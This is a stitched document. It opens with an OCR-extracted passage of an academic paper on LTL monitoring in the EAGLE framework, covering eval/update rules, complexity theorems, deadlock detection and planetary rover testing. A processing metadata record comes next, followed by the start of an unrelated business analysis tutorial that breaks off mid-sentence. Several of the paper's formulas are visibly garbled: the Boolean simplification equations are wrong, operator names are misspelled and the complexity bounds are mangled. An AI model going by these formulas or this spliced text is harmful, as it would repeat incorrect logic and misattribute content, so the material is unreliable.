we could have ignored $\text{update}$ and simply written $\sigma, i \models \text{eval}(F)$ if $\sigma, i + 1 \models F$. The value of a formula $F$ at the end of a trace is given by $\text{value}(F)$. The function $\text{update}$ is defined as follows. \[ \text{eval}(\text{true}, s) = \text{true} \] \[ \text{eval}(\text{false}, s) = \text{false} \] \[ \text{evd}(\text{exp}, s) = \text{value}(\text{exp}) \] \[ \text{eval}(\text{op}, F_1, F_2, s) = \text{eval}(F_1, s) \text{ op } \text{eval}(F_2, s) \] \[ \text{eval}(\neg, F, s) = \neg \text{eval}(F, s) \] \[ \text{eval}(\circ, F, s) = \text{update}(F, s) \] \[ \text{value}(\text{true}) = \text{true} \] \[ \text{value}(\text{false}) = \text{false} \] \[ \text{value}(\text{exp}) = \text{value}(\text{exp}) \] \[ \text{value}(\text{op}, F_1, F_2) = \text{value}(F_1) \text{ op } \text{value}(F_2) \] \[ \text{value}(\neg) = \neg \text{value}(F) \] \[ \text{update}(\text{true}, s) = \text{true} \] \[ \text{update}(\text{false}, s) = \text{false} \] \[ \text{update}(\text{exp}, s) = \text{exp} \] \[ \text{update}(\text{op}, F_1, F_2, s) = \text{update}(F_1, s) \text{ op } \text{update}(F_2, s) \] \[ \text{update}(\neg, F, s) = \neg \text{update}(F, s) \] \[ \text{update}(\circ, F, s) = \text{update}(F, s) \] **Figure 2. eval, value and update definitions** For this rule eval and update are defined as follows. \[ \text{eval}(\text{always}(F), s) = \text{eval}(F \land \text{always}(F), s) \] \[ \text{update}(\text{always}(F), s) = \text{always}(\text{update}(F, s)) \] Similarly we can give the calculus for the other future time LTL operators as follows: \[ \text{eval}(\text{next}(F), s) = \text{eval}(\circ F, s) \] \[ \text{update}(\text{next}(F), s) = \text{next}(\text{update}(F, s)) \] \[ \text{eval}(\text{ sometime}(F), s) = \text{eval}(F \lor \text{ sometime}(F), s) \] \[ \text{update}(\text{ sometime}(F), s) = \text{ sometime}(\text{update}(F, s)) \] \[ \text{eval}(\text{ until}(F_1, F_2), s) = \text{eval}(F_2 \lor (F_1 \land \text{ until}(F_1, F_2), s)) \] \[ \text{update}(\text{ until}(F_1, F_2), s) = \text{ until}(\text{update}(F_1, s), \text{update}(F_2, s)) \] \[ \text{eval}(\text{ unless}(F_1, F_2), s) = \text{eval}(F_2 \lor (F_1 \land \text{ unless}(F_1, F_2), s)) \] \[ \text{update}(\text{ unless}(F_1, F_2), s) = \text{ unless}(\text{update}(F_1, s), \text{update}(F_2, s)) \] **Past Time Operators** The past time LTL operators are defined in the form of rules containing a $\circ$ operator. In general, if a rule contains a formula $F$ guarded by a previous operator on its right hand side then we evaluate $F$ at every event and use the result of this evaluation in the next state. Thus, the result of evaluating $F$ must be stored in some temporary placeholder so that it can be used in the next state. To allocate a placeholder, we introduce, for every formula guarded by a previous operator, an argument in the rule and use these arguments in the definition of eval and update for this rule. Let us illustrate this as follows. \[ \text{max always}(\text{form } F) = F \land \text{always}(F) \] \[ \text{max always past}(\text{form } F) = F \land \text{always past}(F) \] For this rule we introduce another auxiliary rule **AlwaysPast** that contains an extra argument corresponding to the formula \( \circ \text{AlwaysPast}(F) \). In any LTL formula, we use this primed version of the rule instead of the original rule. \[ \text{AlwaysPast}(F) = \text{AlwaysPast}'(F, \text{true}) \\ \text{eval}(\text{AlwaysPast}'(F, \text{past}_1), s) = \text{eval}(F \land \text{past}_1, s) \\ \text{update}(\text{AlwaysPast}'(F, \text{past}_1), s) = \\ \text{AlwaysPast}'(\text{update}(F, s), \text{eval}(\text{AlwaysPast}'(F, \text{past}_1), s)) \] Here, in \text{eval}, the subformula \( \circ \text{AlwaysPast}(F) \) guarded by the previous operator is replaced by the argument \text{past}_1 that contains the evaluation of the subformula in the previous state. In \text{update} we not only update the argument \( F \) but also evaluate the subformula \( \circ \text{AlwaysPast}'(F, \text{past}_1) \) and pass it as second argument of \text{AlwaysPast}'. Thus in the next state \( \text{past}_1 \) is bound to \( \circ \text{AlwaysPast}'(F, \text{past}_1) \). Note that in the definition of \text{AlwaysPast}' we pass true as the second argument. This is because, \text{AlwaysPast} being defined a maximal operator, its previous value at the beginning of the trace is true. Similarly, we can give the calculus for the other past time LTL operators as follows: \[ \text{Previous}(F) = \text{Previous}'(F, \text{false}) \\ \text{eval}(\text{Previous}'(F, \text{past}_1), s) = \text{eval}(\text{past}_1, s) \\ \text{update}(\text{Previous}'(F, \text{past}_1), s) = \\ \text{Previous}'(\text{update}(F, s), \text{eval}(\text{Previous}'(F, \text{past}_1), s)) \] \[ \text{SomePast}(F) = \text{SomePast}'(F, \text{false}) \\ \text{eval}(\text{SomePast}'(F, \text{past}_1), s) = \text{eval}(F \lor \text{past}_1, s) \\ \text{update}(\text{SomePast}'(F, \text{past}_1), s) = \\ \text{SomePast}'(\text{update}(F, s), \text{eval}(\text{SomePast}'(F, \text{past}_1), s)) \] \[ \text{Since}(F_1, F_2) = \text{Since}'(F_1, F_2, \text{false}) \\ \text{eval}(\text{Since}'(F_1, F_2, \text{past}_1), s) = \text{eval}(F_2 \lor (F_1 \land \text{past}_1), s) \\ \text{update}(\text{Since}'(F_1, F_2, \text{past}_1), s) = \\ \text{Since}'(\text{update}(F_1, s), \text{update}(F_2, s), \text{eval}(\text{Since}'(F_1, F_2, \text{past}_1), s)) \] \[ \text{Zince}(F_1, F_2) = \text{Zince}'(F_1, F_2, \text{true}) \\ \text{eval}(\text{Zince}'(F_1, F_2, \text{past}_1), s) = \text{eval}(F_2 \lor (F_1 \land \text{past}_1), s) \\ \text{update}(\text{Zince}'(F_1, F_2, \text{past}_1), s) = \\ \text{Zince}'(\text{update}(F_1, s), \text{update}(F_2, s), \text{eval}(\text{Zince}'(F_1, F_2, \text{past}_1), s)) \] For the sake of completeness of the calculus we explicitly define \text{value} on the above LTL operators as follows: \[ \text{value}(\text{AlwaysPast}(F)) = \text{value}(\text{AlwaysPast}'(F, \text{past}_1)) \\ = \text{value}(\text{Unless}(F_1, F_2)) = \text{value}(\text{Zince}'(F_1, F_2, \text{past}_1)) = \text{true} \\ \text{value}(\text{SomePast}(F)) = \text{value}(\text{SomePast}'(F, \text{past}_1)) \\ = \text{value}(\text{Until}(F_1, F_2)) = \text{value}(\text{Since}'(F_1, F_2, \text{past}_1)) = \text{false} \] Note that in the above calculus we have eliminated the previous operator by introducing an auxiliary argument or placeholder for every formula guarded by the \( \circ \) operator. So, we can't use the operator \( \circ \) when writing an LTL formula; instead we use the rule \text{Previous} as defined above. ### Correctness of Evaluation Given a set of definitions of \text{eval}, \text{update} and \text{value} functions for the different operators of LTL, as detailed above, we claim that for a given sequence \( \sigma = s_1 s_2 \ldots s_n \) and an EAGLE embedded LTL formula \( F \): \[ \sigma, 1 \models \text{EAGLE} \iff \text{value}(\ldots \text{eval}(\text{eval}(F, s_1), s_2) \ldots s_n)) \] Insufficient space prohibits inclusion of the proof. ### 4 Implementation and Complexity We have implemented in Java the EAGLE monitoring framework. In order to make the implementation efficient we use the decision procedure of Hsiang [13]. The procedure reduces a tautological formula to the constant true, a false formula to the constant false, and all other formulas to canonical forms, each as an exclusive disjunction \( (\oplus) \) of conjunctions. The procedure is given below using equations that are shown to be Church-Rosser and terminating modulo associativity and commutativity. For the sake of simplicity: \[ \text{true} \land \phi = \phi \land \text{false} = \text{false} \\ \phi \land \text{false} = \phi \land \phi = \phi \\ \phi \lor \text{false} = \text{false} \\ \phi \lor \phi = \text{true} \\ \phi \lor \text{false} = \text{true} \\ \text{true} \land \phi = \text{true} \\ \text{true} \land \text{false} = \text{false} \\ \phi \land \text{true} = \phi \land \phi = \phi \\ \phi \land \text{false} = \text{false} \\ \text{false} \lor \phi = \text{false} \\ \text{false} \lor \text{false} = \text{false} \] In particular the equations \( \phi \land \phi = \phi \) and \( \phi \lor \phi = \phi \) are shown to be Church-Rosser and terminating modulo associativity and commutativity. #### Theorem 1 The size of the formula at any stage of monitoring is bounded by \( O(m^2 2^m \log m) \), where \( m \) is the size of the initial LTL formula \( \phi \) which we started monitoring. **Proof** The above set of equations, when regarded as simplification rules, keeps any LTL formula in a canonical form, which is an exclusive disjunction of conjunctions, where the conjuncts are either propositions or subformulas having temporal operators at top. Moreover, after a series of applications of \text{eval} on the states \( s_1 s_2 \ldots s_n \), the conjuncts in the normal form \( \text{eval}(\ldots \text{eval}(\text{eval}(\phi, s_1), s_2) \ldots s_n) \) are propositions or subformulas of the initial formula \( \phi \), each having a temporal operator at its top. Since there are at most \( m \) such subformulas, it follows that there are at most \( 2^m \) possibilities to combine them in a conjunction. The space requirement for a conjunction is \( O(m \log m) \), assuming that in the conjunction, instead of keeping the actual conjuncts, we keep a pointer to the conjuncts and assuming that each pointer takes \( O(\log m) \) bits.1 Therefore, one --- 1Every unique subformula having a temporal operator at the top in the original formula can give rise to several copies in the process of monitoring. For example, if we consider \( F_1 = \Box \phi \) after some steps, it may get converted to \( F_2 = \phi \land \Box \phi \). In \( F_2 \) the two subformulas \( \phi \) are essentially copies of \( \phi \) in \( F_1 \). It is easy to see all such copies at any stage of monitoring will be same. So we can keep a single copy of them and in the formula we use a pointer to point to that copy. needs space $O(m^{2^m}\log m)$ to store the structure of any exclusive disjunction of such conjunctions. Now, we need to consider the storage requirements for each of the conjuncts that appears in the conjunction. Note that, if a conjunct contains a nested past time operator, the $past_t$ argument of that operator can be a formula. However, instead of storing the actual formula at the argument $past_t$ we can have a pointer to the formula. Thus, each conjunct can take space up to $O(m\log m)$. Hence space required by all the conjuncts is $O(m^2\log m)$. Now for each past operator we have a formula that is pointed to by the $past_t$ argument and all those formulas by the above reasoning can take up space $O(m^{2^m}\log m)$. Hence the total space requirement is $O(m^{2^m} + m^2\log m + m^{2^m}\log m)$, which is $O(m^{2^m}\log m)$. The implementation contains a strategy for the application of these equations that ensures that the time complexity of each step in monitoring is bounded. We next describe the strategy briefly. Since, our LTL formulas are exclusive disjunction of conjunctions we can treat them as a tree of depth two: the root node at depth 0 representing the $\oplus$ operator, the children of the root at depth 1 representing the $\land$ operators, and the leaf nodes at depth 2 representing propositions and subformulas having temporal operators at the top. The application of the eval function on a formula is done in depth-first fashion on this tree and we build up the resultant formula in a bottom-up fashion. At the leaves the application of eval results either in the evaluation of a proposition or the evaluation of a rule. The evaluation of a proposition returns either true or false. We assume that this evaluation takes unit time. On the other-hand, the evaluation of a rule may result in another formula in canonical form. The formula at any internal node (i.e. a $\land$ node or a $\oplus$ node) is then evaluated by taking the conjunction (or exclusive disjunction) of the formulas of the children nodes as they get evaluated and then simplifying them using the set of equations simplify. Note that the application of simplify on the conjunction of two formulas requires the application of the distributive equation $\phi_1 \land (\phi_2 \oplus \phi_3) = (\phi_1 \land \phi_2) \oplus (\phi_1 \land \phi_3)$ and possibly other equations. At any stage of this algorithm there are three formulas that are active: the original formula $F$ on which eval is applied, the formula $F'$, and the result of the evaluation of the subformula $F_{sub}$. So, by theorem 1 we can say that the space complexity of this algorithm is $O(m^{2^m}\log m)$. Moreover, as the algorithm traverses the formula once at each node it can possibly spend $O(m^{2^m}\log m)$ time to do the conjunction and exclusive disjunction. Hence the time complexity of the algorithm is $O(m^{2^m}\log m) \cdot O(m^{2^m}\log m)$ or $O(m^{2^m}\log^2 m)$. These two bounds are given as the following theorem. **Theorem 2** At any stage of monitoring the space and time complexity of the evaluation of the monitored LTL formula on the current state is $O(m^{2^m}\log m)$ and $O(m^{4^m}\log^2 m)$ respectively. ## 5 Examples and Experiments This section illustrates the use of Eagle on two concurrency-related applications - detection of deadlock potentials and testing of a real-time concurrent system. ### 5.1 Using Eagle for Deadlock Detection We present an example that illustrates the use of EAGLE to detect a simple class of cyclic deadlocks. Specifically, EAGLE monitors an event stream of lock acquisitions and releases, and reports any cyclic lock dependencies. If there are two threads $t_1$ and $t_2$ such that $t_1$ takes lock $l_1$, and then prior to releasing $l_1$, takes lock $l_2$, and furthermore if $t_2$ takes lock $l_2$, and then prior to releasing $l_2$, takes lock $l_1$, then there is a cyclic lock dependency that indicates the possibility of deadlock. This is a simplification of the general dining philosopher problem, restricted to cycles of length two. We present two implementations. One illustrates how EAGLE integrates with Java, allowing one to intermix algorithms written in a general programming language with EAGLE monitors. The other is a "pure" solution that just uses EAGLE rules. Each solution utilizes the ability of EAGLE to parameterize rules with data values as well as formulas. For both implementations the state observed by EAGLE contains three integer variables that get updated each time a new lock or release event is sent to the observer. Let s be the object representing the observer state. The variable s.type is set to 1 if the event is a lock event and 2 if it is a release event. s.thread is an integer which uniquely identifies the thread and s.lock uniquely identifies the lock. For clarity we define predicates s.lock() and s.release() that test whether s.type is set to 1 or 2, respectively. We first present the pure solution. ``` min Conflict(int t, int l1, int l2) = Until(-(s.release()) \land s.thread = t \land s.lock = l2), s.lock() \land s.thread = t \land s.lock = l1) min ConflictLock(int t, int l1, int l2) = s.lock() \land s.type \neq 2 \land s.thread \neq t \land s.lock = l2 \land Conflict(s.thread, l1, l2) min NestedLock(int t, int l) = Until(-(s.release()) \land s.thread = t \land s.lock = l), s.lock() \land s.thread = t \land s.lock \neq 1 \land (\circ Sometime(ConflictLock(t, l, s.lock)) \lor \circ SometimeFast(ConflictLock(t, l, s.lock)))) mon M = -\circ Sometime(s.lock()) \land NestedLock(s.thread, s.lock)) ``` The intuition is that the Sometime in monitor $M$ is satisfied in a state where a lock is taken that is the "first" of the four locks in the pattern described above. The thread and the lock value of that lock are passed as data parameters to *NestedDiffLock* which "searches" for a subsequent lock taken by that thread prior to the release of the first lock. If such a second lock is found, it binds the data value of the second lock to a data parameter and searches both forward and backward through the trace with *ConflictLock* for a second thread that takes the two locks in reverse order. The second implementation uses a set data structure within the observer state that holds triples of values of the form $[t_1,l_1,l_2]$ recording that thread $t_1$ took nested locks $l_1$ and then $l_2$. The predicate *addTriple* inserts such a triple into the set and evaluates to true if there is no conflicting triple in the set. A conflicting triple is one of the form $[t_2,l_2,l_1]$ for $t_2 \neq t_1$. \[ \text{max } \text{DiffLock}(t_1, l_1) = s.lock() \land s.thread = t_1 \land s.lock \neq l_1 \\ \text{max } \text{Checklock}(t_1, l_1) = s.lock() \land s.thread = t_1 \land s.lock = l_1 \\ \text{max } \text{Release}(t_1, l_1) = s.release() \land s.thread = t_1 \land s.lock = l_1 \\ \text{min } \text{NestedDiffLock}(t_1, l_1) = \\ \text{Until}(-\text{Release}(t_1), \text{Difflock}(t_1,l_1)) \\ \text{min } \text{NestedCheckLock}(t_1, l_1) = \\ \text{Until}(-\text{Release}(t_1), \text{Checklock}(t_1,l_1)) \\ \text{mon } M = \text{Always}((s.lock() \land \text{NestedDiffLock}(s.thread, s.lock)) \\ \rightarrow \text{NestedCheckLock}(s.thread, s.lock)) \] The monitor identifies a first lock and the rule *NestedDiffLock* returns true if a second, nested, lock is taken. If so, *NestedCheckLock* adds the triple to the set and returns false if a conflict exists. ### 5.2 Testing a Planetary Rover The EAGLE logic has been applied in the testing of a planetary rover controller, as part of an ongoing collaborative effort with other colleagues (see [2]) to create a fully automated test-case generation and execution environment for this application. The controller consists of 35,000 lines of C++ code and is implemented as a multi-threaded system, where synchronization between threads is performed through shared variables, mutexes and condition variables. The controller operates a rover, named K9, which essentially is a small car/robot on wheels. K9 itself is a prototype, and serves to form the basis of experiments with rover missions on Mars. The controller executes plans given as input. A plan is a tree-like structure of actions and sub-actions. The leaf-actions control the rover hardware components. Each action is optionally associated with time constraints indicating when it should start and when it should terminate. Figure 3 presents an example input plan. The plan is named P and consists of two sub-tasks T1 and T2, which are supposed to be executed sequentially in the given order. The plan specifies that T1 should start 1-5 seconds after P starts and should end 1-30 seconds after T1 starts. Task T2 should start 10-20 seconds after T1 ends. The controller has been hand-instrumented in a few places to generate an execution trace when executed. An example execution trace of the plan in Figure 3 is presented below: ```plaintext start P 397 start T1 1407 success T1 2440 start T2 14070 success T2 15200 success P 15360 ``` In addition to information about start and (successful or failing) termination, each event in the trace is associated with a time-stamp in milliseconds since the start if the application. The testing environment, named X9 (explorer of K9), contains a test-case generator, that automatically generates input plans for the controller from a grammar describing the structure of plans. A model checker extended with symbolic execution is used to generate the plans [14]. Additionally, for each input plan a set of temporal formulas is generated, that the execution trace obtained by executing that plan should satisfy. The controller is executed on each generated plan, and the implementation of EAGLE is used to monitor that the generated execution trace satisfies the formulas generated for that particular plan. The properties generated for the plan in Figure 3 are presented in Figure 4, and should be self-explainable. X9 was evaluated by seeding errors in the rover controller. One error had to do with the closeness in time between termination of one task and the start of the successor. If a task $T_1$ ended in a particular time range (after the start time of the successor $T_2$), then task $T_2$ would wrongly fail rather than execute. Running X9 detected this problem immediately. Note that the property violated was binary/propositional in nature: a task failed that should have succeeded. ![Figure 3. Example plan](image-url) Future work includes: optimizing the current implementation and investigating other efficient subsets of EAGLE. Figure 4. Generated properties EAGLE allows for the formulation of real-time properties that take the time stamps into account. Such an experiment is mentioned in [5]. In that experiment a real unknown bug was located. It was discovered that the application did not check lower bounds on durations, whereas it should. That is, if a task finished before it was supposed to, the task should fail, but it wrongly succeeded. The bug was not immediately corrected, and later showed up during a field test of the rover. 6 Conclusion and Future Work We have presented a representation of linear temporal logic with both past and future temporal operators in EAGLE. We have shown how the generalized monitoring algorithm for EAGLE becomes simple and elegant for this particular case. We have bounded the space and time complexity of this specialized algorithm and thus showed that general LTL monitoring is space efficient if we use the EAGLE framework. Initial experiments have been successful. Future work includes: optimizing the current implementation and investigating other efficient subsets of EAGLE. References
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/20050010167.pdf", "len_cl100k_base": 10704, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 38044, "total-output-tokens": 12782, "length": "2e13", "weborganizer": {"__label__adult": 0.0003769397735595703, "__label__art_design": 0.0004191398620605469, "__label__crime_law": 0.0005331039428710938, "__label__education_jobs": 0.0006346702575683594, "__label__entertainment": 9.21487808227539e-05, "__label__fashion_beauty": 0.00018656253814697263, "__label__finance_business": 0.00030231475830078125, "__label__food_dining": 0.0004167556762695313, "__label__games": 0.0007405281066894531, "__label__hardware": 0.0014219284057617188, "__label__health": 0.0006542205810546875, "__label__history": 0.00035953521728515625, "__label__home_hobbies": 0.0001367330551147461, "__label__industrial": 0.0007328987121582031, "__label__literature": 0.00029397010803222656, "__label__politics": 0.0004301071166992187, "__label__religion": 0.0006051063537597656, "__label__science_tech": 0.1004638671875, "__label__social_life": 0.00011008977890014648, "__label__software": 0.007808685302734375, "__label__software_dev": 0.8818359375, "__label__sports_fitness": 0.0003612041473388672, "__label__transportation": 0.0008988380432128906, "__label__travel": 0.00024211406707763672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40882, 0.02017]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40882, 0.64352]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40882, 0.78973]], "google_gemma-3-12b-it_contains_pii": [[0, 2289, false], [2289, 7843, null], [7843, 15012, null], [15012, 18613, null], [18613, 25581, null], [25581, 31199, null], [31199, 36097, null], [36097, 40882, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2289, true], [2289, 7843, null], [7843, 15012, null], [15012, 18613, null], [18613, 25581, null], [25581, 31199, null], [31199, 36097, null], [36097, 40882, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40882, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40882, null]], "pdf_page_numbers": [[0, 2289, 1], [2289, 7843, 2], [7843, 15012, 3], [15012, 18613, 4], [18613, 25581, 5], [25581, 31199, 6], [31199, 36097, 7], [36097, 40882, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40882, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
eeb59bd5b5ed2f71f97139a667f1bdd195f5923a
About the Tutorial Business Analysis is a subject which provides concepts and insights into the development of the initial framework for any project. It holds the key to guide key stakeholders of a project to perform business modelling in a systematic manner. This tutorial provides a brief overview of the concepts of business analysis in an easy to understand manner. Audience This tutorial is meant for aspiring business analysts, and project owners or business owners, coordinators and project team members who often work closely with business analysts. In addition, it will also be useful for anyone who is involved in capturing, writing, analyzing, or understanding requirements for Information Technology solutions, including Subject Matter Experts (SME), Business Process Managers, and Business Process Users. Prerequisites To understand this tutorial, it is advisable to have a foundation level knowledge of business scenarios, process and domain knowledge pertaining to a few industries. Copyright & Disclaimer © Copyright 2017 by Tutorials Point (I) Pvt. Ltd. All the content and graphics published in this e-book are the property of Tutorials Point (I) Pvt. Ltd. The user of this e-book is prohibited to reuse, retain, copy, distribute or republish any contents or a part of contents of this e-book in any manner without written consent of the publisher. We strive to update the contents of our website and tutorials as timely and as precisely as possible, however, the contents may contain inaccuracies or errors. Tutorials Point (I) Pvt. Ltd. provides no guarantee regarding the accuracy, timeliness or completeness of our website or its contents including this tutorial. If you discover any errors on our website or in this tutorial, please notify us at contact@tutorialspoint.com # Table of Contents - About the Tutorial ......................................................................................... i - Audience ........................................................................................................ i - Prerequisites ................................................................................................... i - Copyright & Disclaimer ................................................................................ i - Table of Contents .......................................................................................... ii 1. BUSINESS ANALYSIS – INTRODUCTION ................................................. 1 2. SOFTWARE DEVELOPMENT LIFE CYCLE ............................................... 4 - Post SDLC Process ....................................................................................... 6 - Role of Business Analyst during SDLC Process ......................................... 7 3. ROLES OF BUSINESS ANALYSTS .......................................................... 8 - Major Roles of a BA .................................................................................... 8 - Key Responsibilities of a Business Analyst ................................................ 9 - What a BA is Expected to Deliver? .............................................................. 10 4. BA TOOLS AND TECHNIQUES .............................................................. 12 - Functional and Non-Functional Requirements ......................................... 12 5. JAD SESSION ............................................................................................. 14 - Use of a JAD Session .................................................................................. 14 - Participants in a JAD Session ....................................................................... 14 6. REQUIREMENT GATHERING TECHNIQUES .......................................... 16 7. FUNCTIONAL REQUIREMENTS DOCUMENT ......................................... 18 - Functional Requirements Deliverables ....................................................... 18 8. SOFTWARE REQUIREMENTS SPECIFICATION ......................................................... 20 9. USE-CASES .............................................................................................................. 22 What is a Use-Case? ............................................................................................... 22 Benefits of a Use-Case .......................................................................................... 22 The Anatomy of a Use-Case ................................................................................ 22 Guidance for Use-Case Template ........................................................................ 23 Use-Case Definition ............................................................................................... 23 10. USE-CASE DIAGRAMS .......................................................................................... 26 Drawing Use-Case Diagrams ............................................................................... 26 Example – Withdrawal Use-Case ......................................................................... 28 Use-Case Template ............................................................................................... 31 11. REQUIREMENTS MANAGEMENT .......................................................................... 32 Why Projects Fail .................................................................................................. 32 Why Successful Teams do Requirements Management ........................................... 32 Let’s Start with the Basics ................................................................................... 33 Collaboration & Buy-In from Stakeholders ............................................................ 34 12. PLANNING GOOD REQUIREMENTS .................................................................. 36 Requirement Gathering and Analysis ................................................................... 36 Eliciting Approach ................................................................................................. 37 Different Types of Requirements .......................................................................... 37 Traceability & Change Management ..................................................................... 39 Idea Requirements Design Test Business Objectives .......................................... 40 Quality Assurance ................................................................................................ 40 Obtaining Requirements Signoff .......................................................................... 41 13. BUSINESS MODELLING ........................................................................................................42 Purpose of Business Modelling ......................................................................................... 42 Performing GAP Analysis .................................................................................................. 43 To Assess Proposed System ............................................................................................... 44 Guiding Principles for Business Modelling ....................................................................... 44 Example of BA role in Modelling ERP Systems ................................................................. 44 Functional Business Analyst ............................................................................................. 45 Other Major Activities ....................................................................................................... 45 Tool 1: Microsoft Visio ....................................................................................................... 46 Tool 2: Enterprise Architect .............................................................................................. 48 Tool 3: Rational Requisite Pro .......................................................................................... 49 What is Business Analysis? Business Analysis is the set of tasks, knowledge, and techniques required to identify business needs and determine solutions to enterprise business problems. Although, the general definition is similar, the practices and procedures may vary in various industries. In Information technology industry, solutions often include a systems development component, but may also consist of process improvement or organizational change. Business analysis may also be performed to understand the current state of an organization or to serve as a basis for the identification of business needs. In most cases, however, business analysis is performed to define and validate solutions that meet business needs, goals, or objectives. Who is a Business Analyst? A business analyst is someone who analyzes an organization or business domain (real or hypothetical) and documents its business, processes, or systems, assessing the business model or its integration with technology. However, organizational titles vary such as analyst, business analyst, business systems analyst or maybe systems analyst. Why a Business Analyst? Organizations employ business analysis for the following reasons: - To understand the structure and the dynamics of the organization in which a system is to be deployed. - To understand current problems in the target organization and identify improvement potentials. - To ensure that the customer, end user, and developers have a common understanding of the target organization. In the initial phase of a project, when the requirements are being interpreted by the solution and design teams, the role of a Business analyst is to review the solutions documents, work closely with the solutions designers (IT team) and Project managers to ensure that requirements are clear. In a typical large-size IT organization, especially in a development environment, you can find On-site as well as offshore delivery teams having the above-mentioned roles. You can find a “Business Analyst” who acts as a key person who has to link both the teams. Sometimes, he would interact with Business users and at times technical users and finally to all the stakeholders in the projects to get the approval and final nod before proceeding with the documentation. Hence, the role of BA is very crucial in the effective and successful jumpstart for any project. **Role of an IT Business Analyst** The role of a Business analyst starts from defining and scoping the business areas of the organization, then eliciting the requirements, analyzing and documenting the requirements, communicating these requirements to the appropriate stakeholders, identifying the right solution and then validating the solution to find if the requirements meet the expected standards. How is it different from other Professions? Business analysis is distinct from financial analysis, project management, quality assurance, organizational development, testing, training and documentation development. However, depending on the organization, a Business Analyst may perform some or all these related functions. Business analysts who work solely on developing software systems may be called IT business analysts, technical business analysts, online business analysts, business systems analysts, or systems analysts. Business analysis also includes the work of liaison among stakeholders, development teams, testing teams, etc. Software Development Life Cycle (SDLC) is a process followed in a software project, within a software organization. It consists of a detailed plan describing how to develop, maintain, replace and alter or enhance specific software. It defines a methodology for improving the quality of software and the overall development process. - SDLC is a process used by IT analysts in order to develop or redesign high quality software system, which meets both the customer and the real-world requirement. - It takes into consideration all the associated aspects of software testing, analysis and post-process maintenance. The important phases of SDLC are depicted in the following illustration: **Planning Stage** Every activity must start with a plan. Failing to plan is planning to fail. The degree of planning differs from one model to another, but it’s very important to have a clear understanding of what we are going to build by creating the system's specifications. **Defining Stage** In this phase, we analyze and define the system's structure. We define the architecture, the components, and how these components fit together to produce a working system. **Designing Stage** In system design, the design functions and operations are described in detail, including screen layouts, business rules, process diagrams and other documentation. The output of this stage will describe the new system as a collection of modules or subsystems. **Building Stage** This is the development phase. We start code generation based on the system's design using compilers, interpreters, debuggers to bring the system to life. **Implementation** Implementation is a part of the Building Stage. In this phase, we start code generation based on the system's design using compilers, interpreters, debuggers to bring the system to life. **Testing Stage** As different parts of the system are completed; they are put through a series of tests. It is tested against the requirements to make sure that the product is actually solving the needs addressed during the requirement phase. - Test plans and test cases are used to identify bugs and to ensure that the system is working according to the specifications. - In this phase, different types of testing like unit testing, manual testing, acceptance testing and system testing is done. **Defect Tracking in Testing** Software test reports are used to communicate the results of the executed test plans. This being the case, a report should contain all test information that pertains to the current system being tested. The completeness of reports will be verified in walkthrough sessions. Testing for a project seeks to accomplish two main goals: - Detect failures and defects in the system. - Detect inconsistency between requirements and implementation. The following flowchart depicts the **Defect Tracking Process**: To achieve the main goals, the testing strategy for the proposed system will usually consist of four testing levels. These are unit testing, integration testing, acceptance testing, and regression testing. The following subsections outline these testing levels, which development team roles are responsible for developing and executing them, and criteria for determining their completeness. **Deployment** After the test phase ends, the system is released and enters the production environment. Once the product is tested and ready to be deployed it is released formally in the appropriate market. Sometime product deployment happens in stages as per the organization’s business strategy. The product may first be released in a limited segment and tested in the real business environment (UAT - User acceptance testing). Then based on the feedback, the product may be released as it is or with suggested enhancements in the targeting market segment. **Post SDLC Process** After the product is released in the market, its maintenance is done for the existing customer base. Once in the production environment, the system will suffer modifications because of undetected bugs or other unexpected events. The system is evaluated and the cycle is repeated for maintaining the system. Role of Business Analyst during SDLC Process As we can see the below diagram, BA is involved in driving business requirement and converting them to solution requirements. He is involved in translating the solution features into software requirements. Then leads in analysis and designing phase, dictates in code development, then follows the testing phase during bug fixing as a change agent in the project team and ultimately fulfills the customer requirements. The role of a business analyst in an IT Project can be multi-fold. It is possible for project team members to have multiple roles and responsibilities. In some projects, the BA may take on the roles of the Business Intelligence Analyst, Database Designer, Software Quality Assurance Specialist, Tester, and/or Trainer when there are limited resources available. It is also possible for a Project Coordinator, or an Application Development Lead, or a Developer to take on the role of the Business Analyst in specific projects. Business Analysis overlaps heavily with analysis of requirements of the business to function as usual and to optimize how they function. Some examples of Business Analysis are: - Creating Business Architecture - Preparing a Business Case - Conducting Risk assessment - Requirements Elicitation - Business Process Analysis - Documentation of Requirements **Major Roles of a BA** A key role of most business analysts is to liaison between the business and technical developers. Business analysts get to work together with the business clients to gather/define requirements of a system or process to improve productivity while at the same time working with the technical teams to design and implement the system/process. **As a Contributor** The major responsibility of a BA is to contribute to the development of Business user’s / key users in identifying business problems, needs and functions, understand stakeholders’ concerns and requirements to identify improvement opportunities, and contribute business input for developing the business case for the IT system development project. **As a Facilitator** A Business Analyst is also supposed to facilitate/co-ordinate in the elicitation and analysis of requirements, collaborating and communicating with stakeholders and to manage their expectations and needs, and ensure the requirements are complete, 